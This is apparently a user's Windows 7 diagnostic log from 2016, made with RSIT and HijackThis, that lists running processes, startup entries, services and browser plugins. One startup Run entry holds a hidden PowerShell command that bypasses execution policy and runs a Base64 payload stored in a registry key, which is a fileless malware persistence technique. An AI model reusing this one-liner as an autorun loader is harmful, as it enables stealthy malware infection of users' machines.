Logfile of random's system information tool 1.10 (written by random/random)
Run by DACAT Computer's at 2016-09-07 16:20:34
Microsoft Windows 7 Ultimate Service Pack 1
System drive C: has 3 GB (3%) free of 100 GB
Total RAM: 2510 MB (36% free)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 16:20:46, on 07/09/2016
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v8.00 (8.00.7601.17514)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\USB Disk Security\USBGuard.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Windows\system32\taskhost.exe
C:\Program Files\PowerISO\PWRISOVM.EXE
C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\TuneUp Utilities 2011\TuneUpUtilitiesApp32.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\system32\taskhost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Users\DACAT Computer's\AppData\Roaming\uTorrent\uTorrent.exe
C:\Users\DACAT Computer's\AppData\Roaming\uTorrent\updates\3.4.8_42449\utorrentie.exe
C:\Users\DACAT Computer's\AppData\Roaming\uTorrent\updates\3.4.8_42449\utorrentie.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Users\DACAT Computer's\Downloads\RSIT.exe
C:\Program Files\trend micro\DACAT Computer's.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_66\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_66\bin\jp2ssv.dll
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O4 - HKLM\..\Run: [UCam_Menu] "C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files\CyberLink\YouCam" update "Software\CyberLink\YouCam\2.0"
O4 - HKLM\..\Run: [USB Antivirus] C:\Program Files\USB Disk Security\USBGuard.exe
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [PWRISOVM.EXE] C:\Program Files\PowerISO\PWRISOVM.EXE -startup
O4 - HKLM\..\Run: [BullGuard] "C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe" -boot
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [GoogleChromeAutoLaunch_66044D0238289D879AA089D4FF4B32EE] "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window
O4 - HKCU\..\Run: [{C278BE4D-C4D5-43CE-B864-81522531FC8F}] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\xkhmeCjFTW').OkZOV)));
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O8 - Extra context menu item: E&xportar a Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000
O9 - Extra button: Enviar a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: &Enviar a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: Report to BullGuard - {27FD17FB-CF63-486b-B2BE-8D8781CBEA01} - C:\Program Files\BullGuard Ltd\BullGuard\Antiphishing\IE\BGAntiphishingIE.dll
O9 - Extra button: Notas &vinculadas de OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: Notas &vinculadas de OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O9 - Extra 'Tools' menuitem: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: @%SystemRoot%\system32\aelupsvc.dll,-1 (AeLookupSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe
O23 - Service: AMD External Events Utility - AMD - C:\Windows\system32\atiesrxx.exe
O23 - Service: @%systemroot%\system32\appidsvc.dll,-100 (AppIDSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\appinfo.dll,-100 (Appinfo) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: @appmgmts.dll,-3250 (AppMgmt) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\audiosrv.dll,-204 (AudioEndpointBuilder) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\audiosrv.dll,-200 (Audiosrv) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\AxInstSV.dll,-103 (AxInstSV) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\bdesvc.dll,-100 (BDESVC) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\bfe.dll,-1001 (BFE) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\qmgr.dll,-1000 (BITS) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: Servicio Bonjour (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: @%systemroot%\system32\browser.dll,-100 (Browser) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: BullGuard backup service (BsBackup) - Unknown owner - C:\Windows\System32\SvcHost.exe
O23 - Service: BullGuard Behavioural Detection (BsBhvScan) - BullGuard Ltd. - C:\Program Files\BullGuard Ltd\BullGuard\BullGuardBhvScanner.exe
O23 - Service: BullGuard cache service (BsCache) - Unknown owner - C:\Windows\System32\SvcHost.exe
O23 - Service: BullGuard on-access service (BsFileScan) - Unknown owner - C:\Windows\System32\SvcHost.exe
O23 - Service: BullGuard firewall service (BsFire) - Unknown owner - C:\Windows\System32\SvcHost.exe
O23 - Service: BullGuard e-mail monitoring service (BsMailProxy) - Unknown owner - C:\Windows\System32\SvcHost.exe
O23 - Service: BullGuard Main Service (BsMain) - Unknown owner - C:\Windows\System32\SvcHost.exe
O23 - Service: BullGuard scanning service (BsScanner) - BullGuard Ltd. - C:\Program Files\BullGuard Ltd\BullGuard\BullGuardScanner.exe
O23 - Service: BullGuard update service (BsUpdate) - BullGuard Ltd. - C:\Program Files\BullGuard Ltd\BullGuard\BullGuardUpdate.exe
O23 - Service: @%SystemRoot%\System32\bthserv.dll,-101 (bthserv) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\System32\certprop.dll,-11 (CertPropSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\cryptsvc.dll,-1001 (CryptSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\cscsvc.dll,-200 (CscService) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @oleres.dll,-5012 (DcomLaunch) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\defragsvc.dll,-101 (defragsvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\dhcpcore.dll,-100 (Dhcp) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\System32\dnsapi.dll,-101 (Dnscache) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\dot3svc.dll,-1102 (dot3svc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\dps.dll,-500 (DPS) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%systemroot%\system32\eapsvc.dll,-1 (EapHost) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\ehome\ehrecvr.exe,-101 (ehRecvr) - Unknown owner - C:\Windows\ehome\ehRecvr.exe
O23 - Service: @%SystemRoot%\ehome\ehsched.exe,-101 (ehSched) - Unknown owner - C:\Windows\ehome\ehsched.exe
O23 - Service: @%SystemRoot%\system32\wevtsvc.dll,-200 (eventlog) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @comres.dll,-2450 (EventSystem) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\fdPHost.dll,-100 (fdPHost) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\fdrespub.dll,-100 (FDResPub) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\FntCache.dll,-100 (FontCache) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @gpapi.dll,-112 (gpsvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: Servicio de Google Update (gupdate) (gupdate) - Unknown owner - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Servicio de Google Update (gupdatem) (gupdatem) - Unknown owner - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: @%SystemRoot%\System32\hidserv.dll,-101 (hidserv) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\kmsvc.dll,-6 (hkmsvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\ListSvc.dll,-100 (HomeGroupListener) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\provsvc.dll,-100 (HomeGroupProvider) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: HP Service (hpsrv) - Hewlett-Packard Company - C:\Windows\system32\Hpservice.exe
O23 - Service: @%SystemRoot%\system32\ikeext.dll,-501 (IKEEXT) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\IPBusEnum.dll,-102 (IPBusEnum) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\iphlpsvc.dll,-500 (iphlpsvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: Servicio del iPod (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: @comres.dll,-2946 (KtmRm) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%systemroot%\system32\srvsvc.dll,-100 (LanmanServer) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\wkssvc.dll,-100 (LanmanWorkstation) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\lltdres.dll,-1 (lltdsvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\lmhsvc.dll,-101 (lmhosts) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\mmcss.dll,-100 (MMCSS) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @%SystemRoot%\system32\FirewallAPI.dll,-23090 (MpsSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe
O23 - Service: @%SystemRoot%\system32\iscsidsc.dll,-5000 (MSiSCSI) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\msimsg.dll,-27 (msiserver) - Unknown owner - C:\Windows\system32\msiexec.exe
O23 - Service: @%SystemRoot%\system32\qagentrt.dll,-6 (napagent) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\netman.dll,-109 (Netman) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\netprofm.dll,-202 (netprofm) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\nlasvc.dll,-1 (NlaSvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\nsisvc.dll,-200 (nsi) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\pnrpsvc.dll,-8004 (p2pimsvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\p2psvc.dll,-8006 (p2psvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\pcasvc.dll,-1 (PcaSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\peerdistsvc.dll,-9000 (PeerDistSvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%systemroot%\system32\pla.dll,-500 (pla) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\umpnpmgr.dll,-100 (PlugPlay) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\pnrpauto.dll,-8002 (PNRPAutoReg) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\pnrpsvc.dll,-8000 (PNRPsvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\polstore.dll,-5010 (PolicyAgent) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\umpo.dll,-100 (Power) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\profsvc.dll,-300 (ProfSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\qwave.dll,-1 (QWAVE) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%Systemroot%\system32\rasauto.dll,-200 (RasAuto) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%Systemroot%\system32\rasmans.dll,-200 (RasMan) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @regsvc.dll,-1 (RemoteRegistry) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%windir%\system32\RpcEpMap.dll,-1001 (RpcEptMapper) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe
O23 - Service: @oleres.dll,-5010 (RpcSs) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\System32\SCardSvr.dll,-1 (SCardSvr) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\schedsvc.dll,-100 (Schedule) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\certprop.dll,-13 (SCPolicySvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\sdrsvc.dll,-107 (SDRSVC) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\seclogon.dll,-7001 (seclogon) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\Sens.dll,-200 (SENS) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\System32\sensrsvc.dll,-1000 (SensrSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\System32\SessEnv.dll,-1026 (SessionEnv) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\ipnathlp.dll,-106 (SharedAccess) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\shsvcs.dll,-12288 (ShellHWDetection) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe
O23 - Service: @%SystemRoot%\system32\sppuinotify.dll,-103 (sppuinotify) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\ssdpsrv.dll,-100 (SSDPSRV) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\sstpsvc.dll,-200 (SstpSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\wiaservc.dll,-9 (StiSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\System32\swprv.dll,-103 (swprv) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\sysmain.dll,-1000 (SysMain) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\TabSvc.dll,-100 (TabletInputService) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\tapisrv.dll,-10100 (TapiSrv) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\tbssvc.dll,-100 (TBS) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\termsrv.dll,-268 (TermService) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\themeservice.dll,-8192 (Themes) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%systemroot%\system32\mmcss.dll,-102 (THREADORDER) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\trkwks.dll,-1 (TrkWks) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe
O23 - Service: TuneUp Utilities Service (TuneUp.UtilitiesSvc) - TuneUp Software - C:\Program Files\TuneUp Utilities 2011\TuneUpUtilitiesService32.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe
O23 - Service: @%SystemRoot%\system32\umrdp.dll,-1000 (UmRdpService) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%systemroot%\system32\upnphost.dll,-213 (upnphost) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\dwm.exe,-2000 (UxSms) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\uxtuneup.dll,-4096 (UxTuneUp) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe
O23 - Service: @%SystemRoot%\system32\w32time.dll,-200 (W32Time) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe
O23 - Service: @%systemroot%\system32\wbiosrvc.dll,-100 (WbioSrvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\wcncsvc.dll,-3 (wcncsvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\WcsPlugInService.dll,-200 (WcsPlugInService) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%systemroot%\system32\wdi.dll,-502 (WdiServiceHost) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%systemroot%\system32\wdi.dll,-500 (WdiSystemHost) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%systemroot%\system32\webclnt.dll,-100 (WebClient) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\wecsvc.dll,-200 (Wecsvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\System32\wercplsupport.dll,-101 (wercplsupport) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\wersvc.dll,-100 (WerSvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%ProgramFiles%\Windows Defender\MsMpRes.dll,-103 (WinDefend) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\system32\winhttp.dll,-100 (WinHttpAutoProxySvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%Systemroot%\system32\wbem\wmisvc.dll,-205 (Winmgmt) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%Systemroot%\system32\wsmsvc.dll,-101 (WinRM) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%SystemRoot%\System32\wlansvc.dll,-257 (Wlansvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files\Windows Media Player\wmpnetwk.exe
O23 - Service: @%SystemRoot%\system32\wpcsvc.dll,-100 (WPCSvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\wpdbusenum.dll,-100 (WPDBusEnum) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\System32\wscsvc.dll,-200 (wscsvc) - Unknown owner - C:\Windows\System32\svchost.exe
O23 - Service: @%systemroot%\system32\SearchIndexer.exe,-103 (WSearch) - Unknown owner - C:\Windows\system32\SearchIndexer.exe
O23 - Service: @%systemroot%\system32\wuaueng.dll,-105 (wuauserv) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\system32\wudfsvc.dll,-1000 (wudfsvc) - Unknown owner - C:\Windows\system32\svchost.exe
O23 - Service: @%SystemRoot%\System32\wwansvc.dll,-257 (WwanSvc) - Unknown owner - C:\Windows\system32\svchost.exe

--
End of file - 23055 bytes

======Scheduled tasks folder======

C:\Windows\tasks\GoogleUpdateTaskMachineCore.job - C:\Program Files\Google\Update\GoogleUpdate.exe /c
C:\Windows\tasks\GoogleUpdateTaskMachineUA.job - C:\Program Files\Google\Update\GoogleUpdate.exe /ua /installsource scheduler

=========Mozilla firefox=========

ProfilePath - C:\Users\DACAT Computer's\AppData\Roaming\Mozilla\Firefox\Profiles\s9j1vjhj.default-1456939752632

"antiphishing@bullguard"=C:\Program Files\BullGuard Ltd\BullGuard\Antiphishing\FF\antiphishing@bullguard\

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 19.0.0.245 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF32_19_0_0_245.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Apple.com/iTunes,version=]
"Description"=Complemento detector de iTunes
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Apple.com/iTunes,version=1.0]
"Description"=
"Path"=C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Google.com/GoogleEarthPlugin]
"Description"=Google Earth in your browser
"Path"=C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@google.com/npPicasa3,version=3.0.0]
"Description"=Picasa3 plugin
"Path"=C:\Program Files\Google\Picasa3\npPicasa3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.66.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.66.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files\Java\jre1.8.0_66\bin\plugin2\npjp2.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
"Path"=C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/SharePoint,version=14.0]
"Description"=Microsoft SharePoint Plug-in for Firefox
"Path"=C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2010-11-15 62376]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre1.8.0_66\bin\ssv.dll [2015-11-26 460384]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}]
Skype Plug-In - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22 1242504]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL [2010-02-27 561552]

